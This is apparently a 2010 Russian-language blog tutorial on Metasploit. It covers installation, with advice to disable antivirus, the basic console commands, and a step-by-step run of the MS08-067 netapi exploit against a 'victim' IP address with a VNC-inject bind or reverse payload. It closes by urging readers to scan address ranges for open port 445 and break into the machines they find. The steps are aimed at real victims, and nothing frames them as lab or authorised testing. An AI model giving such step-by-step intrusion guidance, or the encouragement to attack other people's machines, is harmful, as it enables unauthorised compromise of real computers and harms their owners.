samedi 30 janvier 2010

Простой пример.

В этой статье мы покажем на простом примере на что способен MSF. Для примера будем использовать MS08-067 netapi exploit. Также освоим основные команды.
Запускаем консоль :

Команда show exploits показывает все доступные эксплоиты. Как видите выбирать есть из чего. Имеются эксплоиты под разные платформы: Windows, Linux, IIS, Apach и т.д :

Сейчас мы опишем процедуру выбора определенного эксплоита и его запуска. Команда use [название эксплоита] активирует его рабочую среду. Мы будем использовать как пример MS08-067 netapi exploit.



Набираем : use windows/smb/ms08_067_netapi

Чтобы вернуться назад - используем команду back.
Чтобы узнать больше инфы об эксплоите - info.
Ну так значит, вот, мы и в рабочей среде эксплоита. Набираем show options чтьб увидеть какие условия необходимо выполнить:

Этот эксплоит твебует введения трех параметров : RHOST - IP адресс цели необходимо указать (остальные уже заполнены по умолчанию).
Набираем set RHOST [IP адресс жертвы] :

Команда show payloads выводит все начинки, которые можно использовать с данным эксплоитом.

Мы будем использовать начинку windos/vncinject/bind_tcp

Набираем set PAYLOAD windows/vcninject/bind_tcp

Если вы подозреваете, что на машине жертвы может стоять фаервол, тогда используем windows/vcninject/reverse_tcp.

Ну вот, все готово, теперь командуем exploit или run. Эта команда запускает выбранный и настроенный эксплоит против жертвы :

Ну вот и все - мы в компе у жертвы и можем делать все, что захотим... :)

Video [TuT] на инглише.

Уязвимость правда довольно старенькая, но тачки с ней еще встречаются, так что вперед сканим диапазоны на открытый 445 й порт. Удачи :)

$vz00r

Начало

Установка.

Для начала качаем Metasploit с оффициального сайта.
На момент написания статьи это Metasploit v3.3.3

Процедура установки достаточно проста - жмем постоянно NEXT. Во время установки будет предложено установить NMAP и WinPcap - соглашаемся и устанавливаем и их до кучи (без них многие функции будут недоступны). Под конец получаем на рабочем столе 2 иконки: Metasploit console и Metasploit update.

ВНИМАНИЕ ! : до установки и во время использования необходимо отключить антивирус, а то запарит матюкаться.

Загружаем обновления.

Кликаем на Metasploit update и тупо ждем - Metasploit все сделает сам: и заапдейтится и сам закроется по окончании.



Знакомство : MSF Console.

Кликаем на Metasploit Console и получаем вот это :



Это основное окно MSF с которым мы и будем работать. Пока ни хрена не понятно - но это временно :)

Команды.

Интуитивно или наобум набираем help и жмем ENTER :


Перед нами список команд. Опишем наиболее часто используемые
? – Показывает существующие команды.
back - Назад к консоли.
connect - Соединение с хостом.
exit - Покинуть консоль.
help - Существующие команды.
info – Информация о модуле.
kill – Останавливает текущую работу.
load – Загружает плагин.
quit – Покинуть консоль.
search – Поиск по ключевому слову.
show – Показывает модули.
unload – Выгружает плагин.
use – Выбираем модуль к работе.
run или exploit - запускает модуль.
set - выставляем параметры.

Ну вот и все для начала, а как всем этим пользоваться будет описано в следующей статье...